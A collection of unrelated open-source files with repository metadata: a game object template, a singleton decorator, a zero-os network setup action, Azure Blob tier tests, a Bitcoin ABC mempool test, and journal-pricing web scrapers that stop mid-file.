"content_hash": "1b026ebebd203d831bb81c3d244f0513",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 61,
"avg_line_length": 62,
"alnum_prop": 0.8064516129032258,
"repo_name": "zkbt/exopop",
"id": "762823ef4e97d2bbe7f40ffac426f910588e84fe",
"size": "62",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "exoatlas/populations/TESS.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "91104"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
    """Builds the tangible-object template for the shared Jedi light banner.

    Auto-generated SWG template; hand edits belong between the
    MODIFICATIONS markers below.
    """
    result = Tangible()

    result.template = "object/tangible/furniture/jedi/shared_frn_all_banner_light.iff"
    result.attribute_template_id = 6
    result.stfName("frn_n","frn_all_banner_light")

    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####

    return result
"content_hash": "c5063d694aa3e55771b3d9b4df0c7e19",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 83,
"avg_line_length": 24.53846153846154,
"alnum_prop": 0.6990595611285266,
"repo_name": "obi-two/Rebelion",
"id": "9fba9271ce7bcceb494ebbfac65dc16287b058ce",
"size": "464",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/furniture/jedi/shared_frn_all_banner_light.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
def singleton(cls, *args, **kw):
    """Decorator: always hand back one shared instance of *cls*.

    The instance is created lazily on the first call, using the args
    captured at decoration time; every later call returns it unchanged.
    """
    _cache = {}

    def _get_instance():
        if cls not in _cache:
            _cache[cls] = cls(*args, **kw)
        return _cache[cls]

    return _get_instance
"content_hash": "c6afb38eeb64a7143420b4aadea89dc2",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 45,
"avg_line_length": 29.428571428571427,
"alnum_prop": 0.5776699029126213,
"repo_name": "jwang-share/theysay",
"id": "3bacaa3c3b5cba64fc5703070480e7f80741c0e1",
"size": "221",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "black3/factory/supports/singletonmaker.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CoffeeScript",
"bytes": "6594"
},
{
"name": "JavaScript",
"bytes": "24"
},
{
"name": "Python",
"bytes": "178214"
},
{
"name": "Ruby",
"bytes": "1486"
}
],
"symlink_target": ""
} |
from js9 import j
def configure(job):
    """
    this method will be called from the node.zero-os install action.
    """
    import netaddr
    from zeroos.orchestrator.configuration import get_configuration, get_jwt_token
    from zeroos.orchestrator.sal.Node import Node
    from zeroos.orchestrator.sal.Container import Container

    nodeservice = job.service.aysrepo.serviceGet(role='node', instance=job.model.args['node_name'])
    job.logger.info("execute network configure on {}".format(nodeservice))
    node = Node.from_ays(nodeservice)
    service = job.service

    network = netaddr.IPNetwork(service.model.data.cidr)
    addresses = node.network.get_addresses(network)

    # Spawn a privileged, host-networked OVS container on the node.
    actor = service.aysrepo.actorGet("container")
    config = get_configuration(service.aysrepo)
    args = {
        'node': node.name,
        'hostname': 'ovs',
        'flist': config.get('ovs-flist', 'https://hub.gig.tech/gig-official-apps/ovs.flist'),
        'hostNetworking': True,
        'privileged': True,
    }
    cont_service = actor.serviceCreate(instance='{}_ovs'.format(node.name), args=args)
    job.context['token'] = get_jwt_token(job.service.aysrepo)
    cont_service.executeAction('install', context=job.context)
    container_client = Container.from_ays(cont_service, logger=service.logger).client

    nics = node.client.info.nic()
    nicmap = {nic['name']: nic for nic in nics}
    freenics = node.network.get_free_nics()
    if not freenics:
        raise j.exceptions.RuntimeError("Could not find available nic")

    # freenics = ([1000, ['eth0']], [100, ['eth1']])
    # NOTE(review): the loop below rebinds `nics` from the full nic list to the
    # first speed bucket holding at least two free nics — intentional, but easy
    # to misread.
    for speed, nics in freenics:
        if len(nics) >= 2:
            break
    else:
        raise j.exceptions.RuntimeError("Could not find two equal available nics")

    if 'backplane' not in nicmap:
        # Bond the two free nics into an STP-enabled "backplane" bridge.
        container_client.json('ovs.bridge-add', {"bridge": "backplane", "options": {'stp_enable': 'true'}})
        container_client.json('ovs.port-add', {"bridge": "backplane", "port": nics[0], "vlan": 0})
        container_client.json('ovs.port-add', {"bridge": "backplane", "port": nics[1], "vlan": 0})
        node.client.system('ip address add {storageaddr} dev backplane'.format(**addresses)).get()
        node.client.system('ip link set dev {} mtu 2000'.format(nics[0])).get()
        node.client.system('ip link set dev {} mtu 2000'.format(nics[1])).get()
        node.client.system('ip link set dev backplane up').get()
    if 'vxbackend' not in nicmap:
        # VLAN sub-interface used as the VXLAN backend.
        container_client.json('ovs.vlan-ensure', {'master': 'backplane', 'vlan': service.model.data.vlanTag, 'name': 'vxbackend'})
        node.client.system('ip address add {vxaddr} dev vxbackend'.format(**addresses)).get()
        node.client.system('ip link set dev vxbackend mtu 2000').get()
        node.client.system('ip link set dev vxbackend up').get()
| {
"content_hash": "dd0012f48b8366b61ecbd678aa471160",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 130,
"avg_line_length": 46.18032786885246,
"alnum_prop": 0.6599219027334043,
"repo_name": "g8os/grid",
"id": "b269d7f98a3c3d1d84e2e8a923fe87fe30b0bf65",
"size": "2817",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "templates/network.switchless/actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import unittest
from azure.storage.blob import (
BlockBlobService,
)
from azure.storage.blob.models import StandardBlobTier, BatchSetBlobTierSubRequest, RehydratePriority
from tests.testcase import (
StorageTestCase,
record,
)
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'blob'
# ------------------------------------------------------------------------------
class BlobStorageAccountTest(StorageTestCase):
    """Tests specific to Blob Storage accounts: tiering, batch tiering,
    and archive rehydration.

    Fixes applied: ``i % 2 is 0`` identity comparisons replaced with ``== 0``
    (``is`` on int literals is implementation-dependent), bare ``except:``
    narrowed to ``except Exception:``, and deprecated ``assertEquals``
    replaced with ``assertEqual``.
    """

    def setUp(self):
        super(BlobStorageAccountTest, self).setUp()
        self.bs = self._create_storage_service_for_blob_storage_account(BlockBlobService, self.settings)
        self.container_name = self.get_resource_name('utcontainer')
        if not self.is_playback():
            self.bs.create_container(self.container_name)

    def tearDown(self):
        if not self.is_playback():
            try:
                self.bs.delete_container(self.container_name)
            except Exception:
                # Best-effort cleanup: the container may already be gone.
                pass
        return super(BlobStorageAccountTest, self).tearDown()

    # --Helpers-----------------------------------------------------------------
    def _get_blob_reference(self):
        """Return a fresh unique blob name for this test run."""
        return self.get_resource_name(TEST_BLOB_PREFIX)

    def _create_blob(self):
        """Create an empty blob and return its name."""
        blob_name = self._get_blob_reference()
        self.bs.create_blob_from_bytes(self.container_name, blob_name, b'')
        return blob_name

    def assertBlobEqual(self, container_name, blob_name, expected_data):
        actual_data = self.bs.get_blob_to_bytes(container_name, blob_name)
        self.assertEqual(actual_data.content, expected_data)

    # --Tests specific to Blob Storage Accounts (not general purpose)------------
    @record
    def test_standard_blob_tier_set_tier_api(self):
        self.bs.create_container(self.container_name)
        tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]

        for tier in tiers:
            blob_name = self._get_blob_reference()
            data = b'hello world'
            self.bs.create_blob_from_bytes(self.container_name, blob_name, data)

            # Before an explicit set, the tier is inferred by the service.
            blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)
            self.assertIsNotNone(blob_ref.properties.blob_tier)
            self.assertTrue(blob_ref.properties.blob_tier_inferred)
            self.assertIsNone(blob_ref.properties.blob_tier_change_time)

            blobs = list(self.bs.list_blobs(self.container_name))

            # Assert
            self.assertIsNotNone(blobs)
            self.assertGreaterEqual(len(blobs), 1)
            self.assertIsNotNone(blobs[0])
            self.assertNamedItemInContainer(blobs, blob_name)
            self.assertIsNotNone(blobs[0].properties.blob_tier)
            self.assertTrue(blobs[0].properties.blob_tier_inferred)
            self.assertIsNone(blobs[0].properties.blob_tier_change_time)

            self.bs.set_standard_blob_tier(self.container_name, blob_name, tier)

            # After an explicit set, the tier is reported and no longer inferred.
            blob_ref2 = self.bs.get_blob_properties(self.container_name, blob_name)
            self.assertEqual(tier, blob_ref2.properties.blob_tier)
            self.assertFalse(blob_ref2.properties.blob_tier_inferred)
            self.assertIsNotNone(blob_ref2.properties.blob_tier_change_time)

            blobs = list(self.bs.list_blobs(self.container_name))

            # Assert
            self.assertIsNotNone(blobs)
            self.assertGreaterEqual(len(blobs), 1)
            self.assertIsNotNone(blobs[0])
            self.assertNamedItemInContainer(blobs, blob_name)
            self.assertEqual(blobs[0].properties.blob_tier, tier)
            self.assertFalse(blobs[0].properties.blob_tier_inferred)
            self.assertIsNotNone(blobs[0].properties.blob_tier_change_time)

            self.bs.delete_blob(self.container_name, blob_name)

    def test_empty_batch_set_standard_blob_tier(self):
        # Arrange: an empty batch must be rejected client-side.
        batch_set_standard_blob_tier_requests = list()

        with self.assertRaises(ValueError):
            self.bs.batch_set_standard_blob_tier(batch_set_standard_blob_tier_requests)

    def test_batch_set_257_standard_blob_tier_for_blobs(self):
        # Arrange: 257 sub-requests exceeds the 256-per-batch service limit.
        batch_set_standard_blob_tier_requests = list()
        for i in range(0, 257):
            batch_set_standard_blob_tier_requests.append(
                BatchSetBlobTierSubRequest(self.container_name, i, StandardBlobTier.Archive))

        with self.assertRaises(ValueError):
            self.bs.batch_set_standard_blob_tier(batch_set_standard_blob_tier_requests)

    @record
    def test_set_standard_blob_tier_with_rehydrate_priority(self):
        # Arrange
        self.bs.create_container(self.container_name)
        blob_name = self._create_blob()
        blob_tier = StandardBlobTier.Archive
        rehydrate_tier = StandardBlobTier.Cool
        rehydrate_priority = RehydratePriority.Standard

        # Act: archive first, then request rehydration back to Cool.
        self.bs.set_standard_blob_tier(self.container_name, blob_name, blob_tier,
                                       rehydrate_priority=rehydrate_priority)
        self.bs.set_standard_blob_tier(self.container_name, blob_name, rehydrate_tier)
        blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertEqual('rehydrate-pending-to-cool', blob_ref.properties.rehydration_status)

    @record
    def test_batch_set_standard_blob_tier_for_one_blob(self):
        # Arrange
        batch_set_blob_tier_request = []
        self.bs.create_container(self.container_name)
        blob_name = self._get_blob_reference()
        data = b'hello world'
        blob_tier = StandardBlobTier.Cool
        self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
        sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, blob_tier)
        batch_set_blob_tier_request.append(sub_request)

        # Act
        resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)
        blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)

        # Assert
        self.assertIsNotNone(resp)
        self.assertEqual(len(batch_set_blob_tier_request), len(resp))
        self.assertEqual(blob_tier, blob_ref.properties.blob_tier)
        for sub_response in resp:
            self.assertTrue(sub_response.is_successful)

    @record
    def test_batch_set_three_blob_tier(self):
        # Arrange
        self.bs.create_container(self.container_name)
        tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
        rehydrate_priority = [RehydratePriority.High, RehydratePriority.Standard, RehydratePriority.High]
        blob_names = list()
        batch_set_blob_tier_request = []
        for i in range(0, len(tiers)):
            blob_name = str(i)
            data = b'hello world'
            self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
            sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tiers[i], rehydrate_priority[i])
            batch_set_blob_tier_request.append(sub_request)
            blob_names.append(blob_name)

        # Act
        resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)
        blob_refs = list()
        for blob_name in blob_names:
            blob_refs.append(self.bs.get_blob_properties(self.container_name, blob_name))

        # Assert
        self.assertIsNotNone(resp)
        self.assertEqual(len(batch_set_blob_tier_request), len(resp))
        for i in range(0, len(resp)):
            self.assertTrue(resp[i].is_successful)
            # make sure the tier for each blob is correct
            self.assertEqual(tiers[i], blob_refs[i].properties.blob_tier)

    @record
    def test_batch_set_nine_standard_blob_tier(self):
        # To make sure BatchSubResponse is bounded to a correct sub-request
        # Arrange
        self.bs.create_container(self.container_name)
        tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot,
                 StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot,
                 StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
        batch_set_blob_tier_request = []

        # For even index, create batch delete sub-request for existing blob and their snapshot
        # For odd index, create batch delete sub-request for non-existing blob
        for i in range(0, len(tiers)):
            blob_name = str(i)
            if i % 2 == 0:  # fixed: was "i % 2 is 0" (identity, not equality)
                data = b'hello world'
                self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
            sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tiers[i])
            batch_set_blob_tier_request.append(sub_request)

        # Act
        resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)

        # Assert
        self.assertIsNotNone(resp)
        self.assertEqual(len(batch_set_blob_tier_request), len(resp))
        for i in range(0, len(tiers)):
            is_successful = resp[i].is_successful
            # for every even indexed sub-request, the blob should be deleted successfully
            if i % 2 == 0:  # fixed: was "i % 2 is 0"
                self.assertEqual(is_successful, True, "sub-request" + str(i) + "should be true")
            # For every odd indexed sub-request, there should be a 404 http status code because the blob is non-existing
            else:
                self.assertEqual(is_successful, False, "sub-request" + str(i) + "should be false")
                self.assertEqual(404, resp[i].http_response.status)

    @record
    def test_batch_set_standard_blob_tier_api_with_non_askii_blob_name(self):
        # Arrange
        self.bs.create_container(self.container_name)
        tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
        batch_set_blob_tier_request = []
        for tier in tiers:
            blob_name = "ööööööööö"
            data = b'hello world'
            self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
            sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tier)
            batch_set_blob_tier_request.append(sub_request)

        # Act
        resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)

        # Assert
        self.assertIsNotNone(resp)
        self.assertEqual(len(batch_set_blob_tier_request), len(resp))
        for sub_response in resp:
            self.assertTrue(sub_response.is_successful)

    @record
    def test_batch_set_non_existing_blob_tier(self):
        # Arrange
        self.bs.create_container(self.container_name)
        tiers = [StandardBlobTier.Archive, StandardBlobTier.Cool, StandardBlobTier.Hot]
        batch_set_blob_tier_request = []
        for tier in tiers:
            blob_name = self._get_blob_reference()
            sub_request = BatchSetBlobTierSubRequest(self.container_name, blob_name, tier)
            batch_set_blob_tier_request.append(sub_request)

        # Act
        resp = self.bs.batch_set_standard_blob_tier(batch_set_blob_tier_request)

        # Assert
        self.assertIsNotNone(resp)
        self.assertEqual(len(batch_set_blob_tier_request), len(resp))
        for sub_response in resp:
            self.assertFalse(sub_response.is_successful)

    @record
    def test_rehydration_status(self):
        blob_name = 'rehydration_test_blob_1'
        blob_name2 = 'rehydration_test_blob_2'
        data = b'hello world'
        self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
        self.bs.set_standard_blob_tier(self.container_name, blob_name, StandardBlobTier.Archive)
        self.bs.set_standard_blob_tier(self.container_name, blob_name, StandardBlobTier.Cool)
        blob_ref = self.bs.get_blob_properties(self.container_name, blob_name)
        self.assertEqual(StandardBlobTier.Archive, blob_ref.properties.blob_tier)
        self.assertEqual("rehydrate-pending-to-cool", blob_ref.properties.rehydration_status)
        self.assertFalse(blob_ref.properties.blob_tier_inferred)

        blobs = list(self.bs.list_blobs(self.container_name))
        self.bs.delete_blob(self.container_name, blob_name)

        # Assert
        self.assertIsNotNone(blobs)
        self.assertGreaterEqual(len(blobs), 1)
        self.assertIsNotNone(blobs[0])
        self.assertNamedItemInContainer(blobs, blob_name)
        self.assertEqual(StandardBlobTier.Archive, blobs[0].properties.blob_tier)
        self.assertEqual("rehydrate-pending-to-cool", blobs[0].properties.rehydration_status)
        self.assertFalse(blobs[0].properties.blob_tier_inferred)

        self.bs.create_blob_from_bytes(self.container_name, blob_name2, data)
        self.bs.set_standard_blob_tier(self.container_name, blob_name2, StandardBlobTier.Archive)
        self.bs.set_standard_blob_tier(self.container_name, blob_name2, StandardBlobTier.Hot)
        blob_ref2 = self.bs.get_blob_properties(self.container_name, blob_name2)
        self.assertEqual(StandardBlobTier.Archive, blob_ref2.properties.blob_tier)
        self.assertEqual("rehydrate-pending-to-hot", blob_ref2.properties.rehydration_status)
        self.assertFalse(blob_ref2.properties.blob_tier_inferred)

        blobs = list(self.bs.list_blobs(self.container_name))

        # Assert
        self.assertIsNotNone(blobs)
        self.assertGreaterEqual(len(blobs), 1)
        self.assertIsNotNone(blobs[0])
        self.assertNamedItemInContainer(blobs, blob_name2)
        self.assertEqual(StandardBlobTier.Archive, blobs[0].properties.blob_tier)
        self.assertEqual("rehydrate-pending-to-hot", blobs[0].properties.rehydration_status)
        self.assertFalse(blobs[0].properties.blob_tier_inferred)
# ------------------------------------------------------------------------------
if __name__ == '__main__':
    # Allow running this test module directly as a script.
    unittest.main()
| {
"content_hash": "839f00c9fca49a69ac7e47563e1cf7c4",
"timestamp": "",
"source": "github",
"line_count": 324,
"max_line_length": 120,
"avg_line_length": 43.00617283950617,
"alnum_prop": 0.6437491029137362,
"repo_name": "Azure/azure-storage-python",
"id": "262a35439c4386774e833b52aec75643ee2e970a",
"size": "14271",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/blob/test_blob_storage_account.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "779"
},
{
"name": "Python",
"bytes": "1674801"
},
{
"name": "Shell",
"bytes": "168"
}
],
"symlink_target": ""
} |
"""Test spending coinbase transactions.
The coinbase transaction in block N can appear in block
N+100... so is valid in the mempool when the best block
height is N+99.
This test makes sure coinbase spends that will be mature
in the next block are accepted into the memory pool,
but less mature coinbase spends are NOT.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
from test_framework.wallet import MiniWallet
class MempoolSpendCoinbaseTest(BitcoinTestFramework):
    """Check coinbase-maturity enforcement at the mempool boundary."""

    def set_test_params(self):
        self.num_nodes = 1

    def run_test(self):
        wallet = MiniWallet(self.nodes[0])

        # Invalidate two blocks, so that miniwallet has access to a coin that
        # will mature in the next block
        chain_height = 198
        self.nodes[0].invalidateblock(self.nodes[0].getblockhash(chain_height + 1))
        assert_equal(chain_height, self.nodes[0].getblockcount())
        wallet.rescan_utxos()

        # Coinbase at height chain_height-100+1 ok in mempool, should
        # get mined. Coinbase at height chain_height-100+2 is
        # too immature to spend.
        def coinbase_txid(h):
            block_hash = self.nodes[0].getblockhash(h)
            return self.nodes[0].getblock(block_hash)['tx'][0]

        utxo_mature = wallet.get_utxo(txid=coinbase_txid(chain_height - 100 + 1))
        utxo_immature = wallet.get_utxo(txid=coinbase_txid(chain_height - 100 + 2))

        spend_mature_id = wallet.send_self_transfer(
            from_node=self.nodes[0], utxo_to_spend=utxo_mature)["txid"]

        # other coinbase should be too immature to spend
        immature_tx = wallet.create_self_transfer(
            from_node=self.nodes[0],
            utxo_to_spend=utxo_immature,
            mempool_valid=False)
        assert_raises_rpc_error(
            -26,
            "bad-txns-premature-spend-of-coinbase",
            lambda: self.nodes[0].sendrawtransaction(immature_tx['hex']))

        # mempool should have just the mature one
        assert_equal(self.nodes[0].getrawmempool(), [spend_mature_id])

        # mine a block, mature one should get confirmed
        self.generate(self.nodes[0], 1)
        assert_equal(set(self.nodes[0].getrawmempool()), set())

        # ... and now previously immature can be spent:
        spend_new_id = self.nodes[0].sendrawtransaction(immature_tx['hex'])
        assert_equal(self.nodes[0].getrawmempool(), [spend_new_id])
if __name__ == '__main__':
    # Entry point when executed directly by the functional-test runner.
    MempoolSpendCoinbaseTest().main()
| {
"content_hash": "28b50293b426e380aa69c659ae40cefd",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 93,
"avg_line_length": 37.50704225352113,
"alnum_prop": 0.6308674427337589,
"repo_name": "Bitcoin-ABC/bitcoin-abc",
"id": "14786a500cee2182c8f37e93a91c2caf1053376b",
"size": "2877",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/functional/mempool_spend_coinbase.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28178"
},
{
"name": "C",
"bytes": "1160721"
},
{
"name": "C++",
"bytes": "9817660"
},
{
"name": "CMake",
"bytes": "195193"
},
{
"name": "CSS",
"bytes": "4284"
},
{
"name": "Dockerfile",
"bytes": "3559"
},
{
"name": "HTML",
"bytes": "25754"
},
{
"name": "Java",
"bytes": "41238"
},
{
"name": "JavaScript",
"bytes": "2366459"
},
{
"name": "Kotlin",
"bytes": "3712"
},
{
"name": "M4",
"bytes": "31132"
},
{
"name": "Makefile",
"bytes": "100617"
},
{
"name": "Objective-C++",
"bytes": "5811"
},
{
"name": "PHP",
"bytes": "94504"
},
{
"name": "Perl",
"bytes": "4551"
},
{
"name": "PowerShell",
"bytes": "2277"
},
{
"name": "Python",
"bytes": "2706993"
},
{
"name": "QMake",
"bytes": "798"
},
{
"name": "Ruby",
"bytes": "21108"
},
{
"name": "Rust",
"bytes": "54953"
},
{
"name": "Sage",
"bytes": "39795"
},
{
"name": "Shell",
"bytes": "167526"
},
{
"name": "TypeScript",
"bytes": "66320"
}
],
"symlink_target": ""
} |
import csv
import itertools
import logging
import re
import urllib2
from datetime import date
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import Select
from exceptions import MissingAttributeException
from base import BaseJournalScraper
class BioMedCentralScraper(BaseJournalScraper):
"""Web scraper for publisher BioMed Central
Attributes:
http_address (str): Address of the BioMed Central webpage with journal information
"""
paid_for_patt = re.compile("do not need to pay")
def __init__(self, http_address):
f = urllib2.urlopen(http_address, timeout=5)
self.soup = BeautifulSoup(f, 'lxml')
@staticmethod
def __get_price(soup):
for tag in soup.find_all(class_="CmsArticle_body"):
text = tag.get_text()
price_matches = BioMedCentralScraper.PRICE_PATT.findall(text)
paid_for_matches = BioMedCentralScraper.paid_for_patt.findall(text)
if price_matches:
return str(int(round(float(price_matches[0].replace(",", "").replace("$", "").replace("'", "")))))
elif paid_for_matches:
return 0
raise MissingAttributeException
@staticmethod
def __get_journal_name(soup):
journal_name_tag = soup.find(class_="identity__title-link")
if not journal_name_tag:
raise MissingAttributeException
return journal_name_tag.string
@staticmethod
def __get_issn(soup):
issn_tag = soup.find(class_="SideBox_defList")
if not issn_tag:
raise MissingAttributeException
issn_matches = BioMedCentralScraper.ISSN_PATT.findall(issn_tag.get_text())
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def get_entries(self):
for tag in self.soup.find_all(class_="list-stacked__item"):
link = tag.find("a")["href"]
try:
g = urllib2.urlopen(link + "about", timeout=5)
about_soup = BeautifulSoup(g, 'lxml')
except Exception:
print link + ": Connection problems, continuing to the next entry"
continue
try:
price = BioMedCentralScraper.__get_price(about_soup)
except MissingAttributeException:
print link
print "\n\tNo price could be found"
continue # skipping to the next entry
try:
journal_name = BioMedCentralScraper.__get_journal_name(about_soup)
except MissingAttributeException:
print link
print "\n\tNo journal name could be found"
continue # skipping to the next entry
try:
issn = BioMedCentralScraper.__get_issn(about_soup)
except MissingAttributeException:
print link
print "\n\tNo ISSN could be found"
continue
yield self.to_unicode_row(["BioMed Central", journal_name, str(date.today()), "OA", issn, str(price)])
class ElsevierScraper(BaseJournalScraper):
    """Reads Elsevier journal pricing from a local CSV export."""

    def __init__(self, csv_filepath):
        f = open(csv_filepath, "r")
        self.reader = csv.reader(f)
        next(self.reader)  # skip the header row

    def get_entries(self):
        # CSV layout (observed from the indices used): 0=ISSN, 1=title,
        # 2=model ("Hybrid" or other), 4=price — TODO confirm against export.
        for row in self.reader:
            row = [BaseJournalScraper.clean_string(i) for i in row]
            yield BaseJournalScraper.to_unicode_row(["Elsevier", row[1], str(date.today()),
                                                     'Hybrid' if row[2] == 'Hybrid' else 'OA',
                                                     row[0], str(int(round(float(row[4]))))])
class ExistingScraper(BaseJournalScraper):
    """Re-emits rows from an existing tab-separated dataset."""

    def __init__(self, csv_filepath):
        f = open(csv_filepath, "rU")
        self.reader = csv.reader(f, dialect=csv.excel_tab)
        next(self.reader)  # skip the header row

    @staticmethod
    def __get_row(row):
        # NOTE(review): row[4] is used both as the OA/Hybrid flag and as the
        # price field — looks suspicious; verify against the source dataset.
        if not row[2]:
            raise MissingAttributeException
        return BaseJournalScraper.to_unicode_row((row[0], row[1], row[6],
                                                  "OA" if row[4] else "Hybrid", row[2], str(int(round(float(row[4]))))))

    def get_entries(self):
        for row in self.reader:
            try:
                yield ExistingScraper.__get_row(row)
            except MissingAttributeException as e:
                logging.warning(str(row) + str(e))
class HindawiScraper(BaseJournalScraper):
def __init__(self, http_address):
f = urllib2.urlopen(http_address, timeout=5)
self.soup = BeautifulSoup(f, 'lxml')
@staticmethod
def __get_title(tag):
return tag.find("a").string.strip()
@staticmethod
def __get_price(results):
price_matches = BaseJournalScraper.PRICE_PATT.findall(results[1])
if not price_matches:
raise MissingAttributeException
return str(int(round(float(price_matches[0].replace(",", "").replace("$", "")))))
@staticmethod
def __get_issn(results):
issn_matches = BaseJournalScraper.ISSN_PATT.findall(results[0])
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def get_entries(self):
for tag in itertools.chain(self.soup.find_all(class_="subscription_table_plus"),
self.soup.find_all(class_="subscription_table_minus")):
journal_title = HindawiScraper.__get_title(tag)
results = [i.string for i in tag.find_all("td") if i.string]
if not results or (len(results) != 2):
print "ERROR:"
print "\t" + str(tag.contents)
continue
try:
price = HindawiScraper.__get_price(results)
issn = HindawiScraper.__get_issn(results)
except MissingAttributeException:
print "ERROR:"
print "\t" + str(tag.contents)
continue
yield BaseJournalScraper.to_unicode_row(["Hindawi", journal_title, str(date.today()), "OA", issn, price])
class PLOSScraper(BaseJournalScraper):
    """
    Scraper isn't actually finished yet. Can't port it
    """

    def __init__(self, http_address):
        # Headless browser needed because PLOS renders fees client-side.
        driver = webdriver.PhantomJS(executable_path="/usr/local/bin/phantomjs")
        driver.set_window_size(1120, 550)
        driver.get("https://www.plos.org/publication-fees")
        a = driver.find_elements_by_class_name("feature-block-text")
        for i in a:
            # print i.text
            pass

    def get_entries(self):
        # Placeholder: yields nothing until the scraper is finished.
        raise StopIteration
class SageHybridScraper(BaseJournalScraper):
    """
    Scraper isn't actually finished yet. Can't port it
    """

    def __init__(self, http_address):
        pass

    def get_entries(self):
        # Placeholder: yields nothing until the scraper is finished.
        raise StopIteration
class SpringerHybridScraper(BaseJournalScraper):
    """Reads Springer's journal CSV and keeps only Open Choice (hybrid) titles."""

    def __init__(self, csv_path):
        f = open(csv_path, "r")
        self.reader = csv.reader(f)
        # The export carries nine preamble lines before the data rows.
        for i in range(9):
            next(self.reader)

    def get_entries(self):
        # Flat $3000 APC assumed for all Open Choice journals — TODO confirm.
        for row in self.reader:
            if row[11] == "Hybrid (Open Choice)":
                yield BaseJournalScraper.to_unicode_row(["Springer", BaseJournalScraper.clean_string(row[1]),
                                                         str(date.today()), "Hybrid", row[5], str(3000)])
class SpringerOpenScraper(BaseJournalScraper):
def __init__(self, http_address):
f = urllib2.urlopen(http_address, timeout=5)
self.soup = BeautifulSoup(f, 'lxml')
@staticmethod
def __get_price(soup):
for tag in soup.find_all(class_="CmsArticle_body"):
text = tag.get_text()
price_matches = SpringerOpenScraper.PRICE_PATT.findall(text)
if price_matches:
return str(int(round(float(price_matches[0].replace(",", "").replace("$", "").replace("'", "")))))
raise MissingAttributeException
@staticmethod
def __get_journal_name(soup):
journal_name_tag = soup.find(id="journalTitle")
if not journal_name_tag:
raise MissingAttributeException
return journal_name_tag.string
@staticmethod
def __get_issn(soup):
issn_tag = soup.find(class_="SideBox_defList")
if not issn_tag:
raise MissingAttributeException
issn_matches = SpringerOpenScraper.ISSN_PATT.findall(issn_tag.get_text())
if not issn_matches:
raise MissingAttributeException
return issn_matches[0]
def get_entries(self):
for tag in self.soup.find_all(class_="list-stacked__item"):
link = tag.find("a")["href"]
if "springeropen.com" not in link:
print link + ": Not valid"
continue
try:
g = urllib2.urlopen(link + "about", timeout=5).read()
about_soup = BeautifulSoup(g, 'lxml')
except Exception:
print link + ": Connection problems, continuing to the next entry"
continue
try:
price = SpringerOpenScraper.__get_price(about_soup)
except MissingAttributeException:
print link + ": No price could be found"
continue # skipping to the next entry
try:
journal_name = SpringerOpenScraper.__get_journal_name(about_soup)
except MissingAttributeException:
print link + ": No journal name could be found"
continue # skipping to the next entry
try:
issn = SpringerOpenScraper.__get_issn(about_soup)
except MissingAttributeException:
print link + ": No ISSN could be found"
continue
yield self.to_unicode_row(["Springer", journal_name, str(date.today()), "OA", issn, str(price)])
class WileyScraper(BaseJournalScraper):
def __init__(self, http_address):
f = urllib2.urlopen(http_address)
self.soup = BeautifulSoup(f, 'lxml')
self.driver = webdriver.PhantomJS(executable_path="/usr/local/bin/phantomjs")
self.driver.set_window_size(1120, 550)
self.driver.get(http_address)
@staticmethod
def __get_child_tag_strings(tag):
for child in tag.children:
if not (str(child) == "\n"):
yield child.string
def __get_issn(self):
issn_matches = (WileyScraper.ISSN_PATT
